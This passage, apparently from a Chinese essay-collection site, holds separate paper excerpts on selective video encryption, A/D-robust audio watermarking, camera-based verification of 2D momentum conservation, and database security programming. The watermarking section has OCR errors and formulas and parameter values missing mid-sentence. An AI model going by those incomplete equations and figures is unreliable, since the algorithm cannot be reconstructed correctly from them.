首先通过现有的压缩算法对视频、图像进行压缩,之后再对压缩后的数据加密。加密的算法可更具需要采用安全性不同的算法。此方案的优点是具有较高的安全性;缺点是由于加密是在压缩后的数字图像数据上进行,便不再区分数据的重要性,因此数据加密的效果差、效率低而且数据也量大,使运算的设备负担也加重。选择性加选择性加密是在方案特点的基础上改进,在选择采用一定的压缩标准将视频图像压缩后,再对重要的数据进行着重加密。兼顾了数据的安全与传输的效率。目前,视频图像编码标准根据静态图像和动态图像来分主要分为静态图像的压缩标准和运动图像的压缩标准两种。动态图像的压缩标准主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;静态图像的压缩标准主要有JPEG、JPEG2000。文献[4]采用小波置乱的方法来实现对JPEG2000的小波系数的实时加密。针对MPEG-2标准,文献[5]提出了对I帧加密的思路。针对H.264具有代表性的研究成果有Ahn提出的帧内预测模式加扰方法,该方法将所有I、P帧中的INTRA-4x4块和INTR_16×16块预测模式使用定长伪随机序列进行随机加扰,方法效率高但安全性较差。文献[6]提出了对熵编码过程进行加密的思路,但这种方案的实现比较复杂。

作者:李颖姝 李莹 单位:青岛市第五人民医院 青岛市电子政务与信息资源管理办公室

篇(9)

论文关键词:音频水印;小波变换;倒谱;模/数转换;amr格式

0引言

在电视广播、交通台和音乐会等公共信息传播领域,音频的版权管理和安全传输都非常重要。如果采用数字水印技术,则需要水印算法能够抵抗a/d和d/a转换。目前,具有这种变换的类型可以划分为三种。第种是基于电缆传输方式,以电话线传播和直通电缆连接为典型,所受干扰小。电话线方式是公用信道,能够传播很远,传输秘密水印的载体可以是话音或音乐等类型;而直通电缆方式一般在一个办公实验的局部环境中。第二种是基于广播方式,通过广播媒体或专用频道进行传播。第三种是基于空气直接传播方式,会遭遇各种干扰,通常只能近距离设计。由于音频水印的远程传输和提取具有广泛的应用价值,这些音频传播水印技术在国外已经受到了极大重视并有所成果。在空气传播水印信息方面,德国的steinebach等人…开展了最早的研究,通过设定5—4oocm的多个不同间距,同时使用了4种不同的麦克风,研究了5种音频类型的水印技术,在5~180cm的间距普遍获得了良好的提取效果。随后,日本的achibana等人口研究将水印实时地隐藏到公共环境如音乐演奏会的音乐之中,能够成功地在一个30s音乐片段内隐藏64b的消息,测试的空气传播距离为3m。在电话网络传播方面,加拿大的chen等人开展了模拟电话通道的隐藏,在误码率小于0.001时,其数据带宽达到了265bps。日本的modegi等人设计了一套非接触水印提取方案,通过手机来广播或转存水印音频,然后,通过计算机将秘密从转存的音频文件提取出来。隐藏带宽达到61.5bps,提取率高于90%。但是,这几种研究结果并没有对算法做详细描述。在直通电缆传播方面,项世军等人采用了三段能量比值方法,嵌人的是一串32b信息,虽然提取效果比较好,但由于实验容量太小,实用性不够,且对同步技术有较高的要求;王让定等人采用改进的量化方法、马冀平等人”采用了dct方法,嵌入的都是小图片,但提取效果一般,仅可辨认。雷贽等人在短波广播含水印音频算法方面取得了可喜的进展,通过多种同步方案和算法设计,使水印提取的模拟和实测过程都达到了较好的效果,但实验容量很小。此外,由守杰等人设计了一种相似度计算方法,由于是非盲提取,不适于广播通信领域。作者利用小分段的直方图特性,开展了抗a/d转换的音频水印初步研究,在每段开头总能获得正确提取,但在每段的后续隐藏效果不佳,还需要做许多改进。

可见,在面向公共音频传播方面,如何既能提高隐藏效果又能增大容量,仍然是音频水印算法要解决的一个难题。本文通过数据特性分析,采用倒谱技术和小波分解方法,成功地解决了问题,且能够抵抗一定的手机彩铃amr攻击,为实用化提供了重要基础。

1数据特性描述

音频信号经过具有a/d和d/a转换的传输过程时,必然要涉及到以下问题:

1)音频信号要经历传输过程中的外加干扰,包括50hz的工频电信号,因此,需要选择大于50hz的音频频率信号;

2)因声卡特性不同,音频转换过程不一定具有线性模型;

3)传输中录制的音量往往与播放的音量不一致,这要求水印算法能够抵抗音量的大范围变化;

4)传输中录制开始时刻可能早于也可能晚于播放时刻而且结束时刻也不一定一致,所以水印隐藏的起始位置需要没置标志;

5)转换过程具有一定的滤波特点,可滤除较高频率信号。

1.1音频频率范围选择

对照音频频率响应特性图可以发现,在低频部分的阈值比2khz~4khz的要高得多,不容易察觉;尤其是1khz以下部分,其不可感知性要好得多。文献[4]的实验也表明,音频数据通过a/d和d/a转换后,其低频范围700hz以下的损失非常小。可见,选择在频率为(50,700)范围内的音频数据,用于信息隐藏非常有利。

1.2倒谱系数的选取方法

倒谱变换在音频水印中已经具有了较强的健壮性,能够抵抗噪声、重采样、低通滤波、重量化和音频格式转换等常见攻击。倒谱变换后的数据特征表现为:倒谱系数在中间部分的差异很小,而在两端的变化很大。

图1是对音频进行7级小波分解后,选取5~7级高频数据部分进行倒谱变换情形。在进行统计处理时,如果让全部数据参与,则计算结果在隐藏前后有明显变化;如果不考虑两侧若干个大数据,仅以中间大部分数据参与运算,则计算结果容易保持在一个稳定范围内。

进一步,如果将计算的均值移除,即相当于此时的均值为0。然后,在0的上下两边产生一个偏差,如2,以分别隐藏比特信息“1”和“0”。则在提取时,只需要判断所求均值是否大于0,就可以求得水印比特。这种方法,称之为“数据分离调整”技术。

2算法分析与设计 

2.1隐藏算法流程设计

将原始音频分段时,段数至少是水印比特数。然后,对每段数据进行小波分解,取其低频系数进行倒谱变换,采用前述的数据分离调整技术,以实现水印比特嵌入。之后,先后重组倒谱系数和小波系数,获得含有水印信息的音频段,从而构造为新的音频。该算法流程如图2所示。

为了增强可靠性,对水印信息先做纠错处理,采用bch编码方法。算法的主要工作是寻找合理的参数优化配置,使隐藏效果达到最优。参数主要有:小波分解级数、分段的数据帧长度、数据帧的间距、上下分离的阈值将数据帧的间距设置为数据帧长度的倍数,最大为1,最小为0。期间选择多个系数,结果发现都可以成功实现隐藏。

2.2水印嵌入算法设计

1)水印信息处理。

音频载体分段数至少应该大于,才能满足隐藏要求。

假设每段长为,该段经过小波变换的级分解后,各级小波系数长度分别为:

取低频系数部分,使之频率范围位于(50,l000)内,则需要构造一个组合的低频小波系数集合。以8khz音频为例,实施7级小波分解后,所选择的低频系数部分为:

p的长度非常重要。如果太小了,对隐藏不利;反之,就需要更长的音频载体。所以,音频分段与小波分解具有密切的关系。

3)倒谱变换。

复倒谱变换对于信号序列的均值大于或等于0时,其逆变换可逆;否则不可逆。为此,需要计算指定段信号的均值,若均值小于0则取反。然后对所有指定段进行复倒谱变换。

4)倒谱系数的选取。

去掉首尾波动很大的部分,而选择中间平稳的部分嵌入水印。假设两端各去掉l0个数据,则实际用于隐藏水印的倒谱系数长度为:

5)去均值化处理。

计算剩余部分的均值,然后用每一个倒谱系数减去该均值,得到倒谱系数的相对值。 

6)嵌入水印。

给定一个阈值t,采用整体上下拉开的思路,对以上的相对倒谱系数进行修改,得到最终的倒谱系数,从而实现水印的嵌入。

7)重构音频信号。

对嵌入水印的段重构后,实施复倒谱反变换。然后进行小波重构,从而得到含有水印比特的音频段。将所有这些段重构,就获得了含全部水印信息的音频。

2.3水印提取

水印提取过程的前半部分与嵌入过程是一样。在提取出比特序列后,再经过bch解码处理,从而得到隐藏的水印比特序列。水印提取的流程如图3所示。

对获得的倒谱系数去两侧数据,计算剩下的倒谱系数平均值。按照以下规则进行隐藏信息的提取:

在信息传播方面.针对a/d和d/a传播采用『_直通电缆的传输方式,在单机上用电缆将音频输入输出口相连。传输线为音频线1.8m和延长线1.8m,共3.6m。此外,针对手机彩铃传播采用了amr方式。隐藏水印设计了三种方案,如图4所示。

小容量的便于amr处理,大容量的便于实用化。

仿真工具为matlab7.2.使用windowsmediapldrver播放器播放音频载体,使用cooledit pro工具进行录音、编辑和攻击处理。

基本参数选择为:选用harr小波进行7级小波分解后,按照式(4)选取低频系数区域,所得频段在77.5~5o0hz范围。式(7)中的为l0,式(9)中t值的合适范围在0.005~0.025中实验选取。式(3)中的取值为3200非常合适,此时,实际参与计算均值的数据为155。

3.2音频载体的影响

音频载体选择了三种,如表1所示,  

其采样频率8khz,样本精度为16b,单声道,段的长度为3200。音频转换为8khz的目的是为了今后在电话网上的隐蔽传输,并可以转化为amr文件,传输到手机中,成为手机彩铃的版权管理目的。

经过a/d和d/a传播后,4×4水印提取的误码情况如表1所示。可见,载体的选用非常重要;同时,从音频质量上考虑,选用较小的t值更有利于保证信噪比。所以,以下的实验采用的是“奥运主题歌”。

3.3阈值参数的合理计算

选择了水印“北”进行比较测试,如图5所示。结果表明,在t值为0.016时,误码率为0,效果最佳。为此,后续实验也采用该值。

3.4大容量a/d和d/a传输

采用图像水印“北京”进行大容量测试,音频载体选用“奥运主题歌”。图6为经过a/d和d/a转换前后的数据均值计算对比情况.共有bch编码的555个数据。按照式(10)

提取后,能够完全正确提取,且误码率为0。进一步,将本文算法的实验效果与已有属于盲提取的研究结果相比较,如表2所示。

可见,本文算法虽然带宽小,但水印能够正确提取,而且嵌入容量较大。由于实验中使用了8khz的音频载体,能够广泛应用于语音传输和手机彩铃等场合,所以在电话网络广播方面的实用性强。

3.5抗amr转换

随着手机彩铃的普遍使用,彩铃的安全传播和管理将成为新的问题。本算法在这方面也开展了新的尝试,将水印隐藏在彩铃中,可以起到版权保护或秘密信息传播的作用。

目前手机录音放音格式多数是amr格式,要求算法能够抵抗amr转换攻击。在上述的音频载体中成功完成水印嵌入后,需要将采样精度l6b、采样频率为8000的波形音频转换为amr格式,就可以存入手机中使用或发送给他人。提取时,先将amr文件转换为wav格式,然后再提取水印信息。

篇(10)

关键词 视频分析法;数码相机;二维动量守恒;拍摄技术;误差

【中图分类号】G434 【文献标识码】B

【论文编号】1671-7384(2015)01-0073-03

在人教版高中物理选修3-5《动量守恒定律》一章中,教师用滑块在气垫导轨上的直线运动演示“验证动量守恒定律”的实验,这个实验研究的是一维碰撞动量守恒,但实际生活中更多的是二维或是三维的斜碰,如台球的碰撞、保龄球的碰撞、微观粒子的碰撞和天体的碰撞等[1]。二维或三维运动是大学物理实验教学中的重要内容[2],在现有的普通物理实验教学中,一般只涉及两小球在直线上的碰撞,二维碰撞运动是新内容。

利用视频分析法探究小球“二维碰撞动量守恒”既有利于学生对动量守恒物理知识的完整理解,又有利于学生掌握利用多媒体技术及基本的数字化研究方法。本论文分别利用 “连拍合成技术”“高速连拍技术”和“摄像技术”三种技术对小球二维碰撞动量守恒进行探究实验。

实验准备

1.实验工具与软件:CASIO(EX—FH100)数码相机、计算机、三脚架、光滑的玻璃平面、水平仪、两个颜色不同大小质量相同的直径为25mm的小球、Mr.captor频闪截屏软件、几何画板等。

2.实验环境与条件:在进行实验之前要保证平面和相机水平,玻璃面尽量光滑使摩擦力减少到最小。这里我们用到水平仪分别对相机与平面进行校准,如图1和图2。

实验过程

用数码相机的“连拍合成技术”“高速连拍技术”“摄像技术”结合频闪截屏软件与几何画板软件,分别对两球斜碰过程进行图形获取、图像处理、数据分析。

1.连拍合成技术

(1)图像获取

通过相机的BS功能键进入到情景模式区,选定“连拍影像合成”,如图3。

拍摄的时候,相机会以5张/秒的连拍速度捕捉一个连贯的动作。两个颜色不同、大小质量相同的玻璃球作为研究对象,在光滑平面上,让绿色小球碰撞蓝色小球,拍摄小球的二维碰撞过程,获得连拍合成图像,如图4所示。

(2)图像处理

①将图片粘贴到“几何画板”中,利用“点工具”将图片中的绿色小球和蓝色小球分别用绿色圆点和蓝色圆点表示出来。

②点击工具栏中的自定义工具项目,选择圆工具中过三点的圆(虚线),如图5所示。选择图片中圆表面的任意三点,软件就能将小球圆心标识出来。

③选择移动箭头,鼠标移动到圆上点击鼠标右键,会出现如图6所示的对话框,选择隐藏圆。圆框消失后,将鼠标移动到圆表面的三个点,点击右键,选择隐藏点,依次将三点全部隐藏,最终圆心就能确定了。

④ 选中各点点击“度量”菜单中的“横坐标”“纵坐标”就可以显示小球所在位置的坐标值,再点击“显示”菜单中的“隐藏照片”。

图像处理结果如图7所示。

(3)数据分析

选定各点坐标再点击“数据”菜单中的“制表”,可以得到横纵坐标的表格。由于玻璃板光滑,可以认为小球近似做匀速直线运动,速度可以通过得到,其中。经过计算算得在x方向动量误差为9.7%,在y方向动量误差为4.9%,平均误差为7.3%。在误差允许的范围内,小球二维碰撞过程的动量守恒得到验证。

(4)注意事项

此相机的连拍速度是5张/秒,如果物体运动速度太快,相机合成效果不明显;物体运动速度太慢,画面重叠,所以在做实验前要了解相机的连拍速度,以便对小球运动的速度合理控制。

2.高速连拍技术

按连拍(HS)按钮,如图8所示,将连拍速度设置为40fps,最多连拍幅数设定为30,预先记录连拍设置为0.3s。半按快门钮,进行预先记录拍摄,等到理想拍摄时机时,完全按下快门钮,拍摄想要的图片。两个颜色不同、大小质量相同的玻璃球作为研究对象,在光滑平面让绿球碰撞静止的蓝球,连拍小球的二维碰撞过程,然后通过几何画板对图像进行拼接处理。

光滑平面连拍:绿球碰撞静止的蓝球,如图9所示。

图像处理与数据分析步骤与连拍合成技术相同,最后算得误差平均值为3.5%。

3.视频频闪截屏技术

在拍摄方式中,将动画方式旋钮转至(HD/STD),选择高速动画(HS),按动画按钮开始拍摄,分别在光滑平面让蓝球碰撞静止的绿球和非光滑平面让蓝球与绿球互撞,碰撞完成后,再按动画按钮结束拍摄。然后用频闪截屏软件Mr.Captor对拍摄的视频进行频闪截屏,点击“选项”菜单中“参数”命令,将弹出参数窗体,在“定时/视频”中设置频闪周期为0.1秒,设定图片保存路径。点击“ ”按钮,在屏幕上圈定单摆振动的截屏区域,再点击鼠标右键,在弹出的菜单中选取“开始定时捕捉”命令,于是所捕捉的图片被记录在相应的文件夹中并被自动编号。最后通过几何画板对图像进行拼接处理。在进行图像处理时,处理好一张图片之后,隐藏图片,拖进下一个图片,逐个处理,这样每个小球运动的轨迹就能记录在几何画板之中了。经过计算算得平均误差为26.75%。

三种技术总结与对比

通过对这三种技术进行实验,总结出每种技术的特点与差异,总结如表1。

根据以上分析,得出此实验误差与数码相机的配置有极大的关系。教师可以根据教学条件以及课程的需要选择以上方法探究二维碰撞动量守恒问题。

篇(11)

(一)鉴别身份

在应用数据库时,有一个验证程序,针对全部用户,即鉴别使用用户的身份。在端口计算机和访问计算机的身份鉴别中要使用身份鉴别。当我们想要使用计算机时,用户需要连接相应的HTTP和SSH,输入用户名和密码,来鉴别用户的身份。使用的人需要严格保守密码,同时存留在对应的服务器上。将编程技术运用到计算机数据的使用和建立中,能够实现企业关联数据和内部文件的安全管理,以免由于企业信息泄露,给企业造成经济损失。

(二)可用性

将编程技术运用到数据库系统中,其可用性十分强。成功解决不均衡的负载和一些数据库中的故障等问题是对可用性的要求。当计算机的主接口出现了问题,留作备用的接口将会自动替代问题接口进行工作,这样可以使其他故障不对其产生作用,保证网络在工作过程中的持续稳定性。另外,接收大量的网络数据时,主接口就可以在备用接口的帮助下,完成数据的接收和传输工作,确保计算机能够正常运作。

(三)隐藏信息的特性

在进行通讯连接时,由于计算机中NAT技术的作用,内部网络中的网址会被隐藏,此时显示在数据中的结果是通过公共网络网址进行访问的,这就是编程技术的隐藏性。换句话说,企业的平常管理工作中,用户可以使用计算机直接访问外部网络,然而对企业内部网络的搜索和查看,这些是外部网络无法实现的,成功实现了安全管理及保密企业信息。

二、计算机软件工程的数据库编程技术

(一)设计、开发编程技术

数据库正式投入使用后,需要随时关注系统的运作情况,在系统运行的过程中,尽早发现没有处理的问题并进行分析。所以,就要折返到编程阶段,尽早处理在编程阶段没有处理的问题,完善优化数据存储系统。与此同时,运用不同的编程技术来应对不同的软件应用,根据各种软件应用的不同特性,采取不一样的编程技术,对软件运用中有待处理的问题进行分析,保证软件可以平稳的运作,而且还能够合理化的运用系统资源,假若一部分数据出现传输问题,也能够运用编程技术将出现问题的部分进行调整。

(二)加密数据库文件

当今社会,信息化高速发展,在聊天记录、网络搜索中都存在大量的个人隐私,人们对个人隐私的重视度也逐渐提高,而计算机数据库作为专门存储网络信息的工具,其保密性能的高低,直接关系到人们生活、工作中的信息安全问题。一方面,要分析数据库中存储的基本信息,并加上基本的保护在其中的隐私类消息上,一旦有信息外漏的情况产生,编程师就要及时通过编程的方式处理这个问题,经过编程,加密保护数据库中的文件。在实行加密保护的同时,还要与计算机软件工程的现实情况进行结合,从而充分发挥加密保护的作用;另一方面,加密保护的功能还可以进一步更深层次的设计,将加密保护分成几个层级,以满足不同用户的要求,同时每个用户都可以设置自己的专用登录密码,然后系统编程会确认登录密码的正确与否,并根据对应的密钥,实现深层次加密信息;最后,在数据库编程时,由于信息不同的选择造成各系统间的冲突,能够运用系统间的优化体系,优化处理产生的问题。

(三)设计存储模式

如今的生活中,由于计算机的使用越来越普遍,数据库技术就要保护更多的网络信息数据。一方面,软件系统的设计要以软件功能系统的选取为重点,也可以将其他工程项目设计过程中的理念运用其中,优化设计方案,从而使设计出的数据库能够更加稳定的运行;另一方面,在数据库进行实际存储时,可以将各类信息进行分类存储,方便人们二次使用数据。最后,将优化的数据系统运用到数据库存储模式中,在数据库开始使用后,可以将产生的问题尽早优化,同时还能够将没有解决的问题尽早发现,以使数据库的存储更加方便用户使用。

三、结语

由此可见,将数据库编程技术分析工作做好,意义十分重大。这对于计算机数据库实际应用的提高十分有利,可以扩大编程技术的运用优势,在国家信息化发展方面,提供更多的技术方面支持。所以,基于计算机软件工程的数据库编程技术在今后的计算机研究工作中应予以更多的重视,并科学的评测此类技术的实际运用效果,用以增加适用范围,使其在国家经济社会的发展中发挥作用。

软件工程硕士论文参考文献:

[1]张学立,田林琳.基于计算机软件工程的数据库编程技术浅谈[J].时代农机,2018,45(11):163.